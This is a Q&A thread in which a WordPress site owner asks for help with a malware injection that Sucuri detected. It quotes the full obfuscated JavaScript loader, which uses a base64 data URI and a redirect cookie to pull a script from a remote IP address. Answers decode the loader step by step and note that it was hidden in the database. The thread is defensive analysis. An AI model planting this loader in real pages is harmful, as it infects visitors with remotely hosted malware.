Sucuri detects malware on wordpress but I can't find the malicious code

Question

Yesterday I got a report asking us to check some wordpress website because the person's antivirus blocked said web.

I ran the Sucuri Site Check and it indeed detects malware:

"Known javascript malware: malware.injection?39"

<!--codes_iframe--><script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"><\/script>')} </script><!--/codes_iframe-->

I disabled the web and download all the source code. But when I try to look for the malicious code...I can't find anything. I search in all files and I can't detect anything.

What can I do? Any help would be appreciated.

@Alison Lopez, you might want to leave this question open for a few more hours, just in case somebody has a better answer than I do. — Philip Rowlands, May 30 '19 at 10:38
@EsaJokinen Yes, I've found the code is inside the SQL. It's the first time this happens to me so I didn't think about it. — Sephy, May 30 '19 at 10:41

score 17 · Answer 1 · answered May 30 '19 at 10:28

The malware in question is hosted elsewhere, and is (probably) being added by cross-site-scripting (XSS). If you have a look at the "var src" part, you'll see a long string of Base64-encoded text:

ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=

When decoded, that turns out to be the following:

document.write(unescape('%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%31%39%33%2E%32%33%38%2E%34%36%2E%35%37%2F%6D%52%50%50%7A%43%22%3E%3C%2F%73%63%72%69%70%74%3E'));

document.write adds the specified code into the DOM. URL-decoding the part inside "unescape" results in the following script tag (spaces added to break it):

<script src="http://193.238.46.57/            mRPPzC"></script>

So, the malware is likely hosted at THAT url (whatever it is), and is being injected into the page via the document.write command.

A quick guide to how I did this

Install Notepad++.
Make sure the Mime tools plugin is installed (might be by default?)
Copy the Base64-encoded string into a new file, and select the text.
Under "Plugins", select "MIME Tools" --> Base 64 Decode
Copy and paste the part inside unescape onto a new line
Select the new line and then select "Plugins" --> MIME Tools --> URL Decode

VirusTotal detects this url as malicious, https://www.virustotal.com/#/url/9a1455877f76515dbd1f7196206b98a93742c34e4f5145dec9431d2221d00172/detection — marsnebulasoup, May 30 '19 at 22:23
You could just use the `atob()` function in browser devtools, and then just run the `unescape()` in devtools (both are generally considered safe functions, barring major browser vulns) (without the `document.write`!). Or use an online base64 decoder. — Bob, May 31 '19 at 02:50

Sucuri detects malware on wordpress but I can't find the malicious code

1 Answers1